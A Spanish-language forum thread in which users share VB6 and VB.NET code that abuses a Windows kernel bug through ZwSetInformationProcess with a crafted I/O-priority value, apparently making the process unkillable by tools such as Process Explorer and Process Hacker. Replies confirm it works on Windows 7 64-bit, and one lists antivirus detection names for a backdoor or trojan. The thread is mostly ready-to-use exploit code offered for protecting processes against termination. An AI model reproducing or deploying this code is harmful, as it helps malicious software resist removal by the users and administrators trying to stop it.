Bueno andaba navegando por la web y vi un bug muy bueno conseguido por waleedassar y lo implemente en vb6.
'Pink/Danyfirex
'All Credits http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html


Private Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Private Declare Function ZwSetInformationProcess Lib "ntdll.dll" (ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long



Private Sub Form_Load()
ZwSetInformationProcess GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&
End Sub

Saludos
Imagen
En windows 8 64 bits no me funciono, alguien mas puede comprobar?
Veterano

Las apariencias engañan.
Funcional en Windows 7 64 Bits, muy bueno Pink.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
En Net:
'By Rottweiler
Imports System.Runtime.InteropServices
 
Public Class ProtectMe
#Region "VarPtr Support by Francesco Balena & Code Architects"
    ' -----------------------------------------------------------
    ' VARPTR implementation in VB.NET
    ' Part of VB Migration Partner’s support library
    '
    ' Copyright © 2009, Francesco Balena & Code Architects
    ' -----------------------------------------------------------
    Private Delegate Function VarPtrCallbackDelegate(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Short, _
       ByVal unused1 As Integer, ByVal unused2 As Integer, _
       ByVal unused3 As Integer) As Integer
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Integer, _
       ByVal unused1 As Integer, ByVal unused2 As Integer, _
       ByVal unused3 As Integer) As Integer
    Private Shared Function VarPtrCallback(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
        Return address
    End Function
    Private Shared Function VarPtr(ByRef var As Short) As Integer
        Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
    End Function
    Private Shared Function VarPtr(ByRef var As Integer) As Integer
        Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
    End Function
#End Region
 
    <DllImport("Kernel32.dll")>
    Private Shared Function GetCurrentProcess() As IntPtr
    End Function
 
    <DllImport("ntdll.dll")>
    Private Shared Function ZwSetInformationProcess(ByVal _1 As IntPtr, ByVal _2 As IntPtr, ByVal _3 As IntPtr, ByVal _4 As IntPtr) As IntPtr
    End Function
 
    Public Shared Sub Protect()
        ZwSetInformationProcess(GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&)
    End Sub
End Class

Saludos
Imagen
ZeRiito escribió:es un bug ha que te refieres amigo ?

ni el process explorer ni el process hacker etc de herramientas
no me van ha permitir cerrar el proceso?
Exacto.

saludos
Imagen
Responder

Volver a “Fuentes”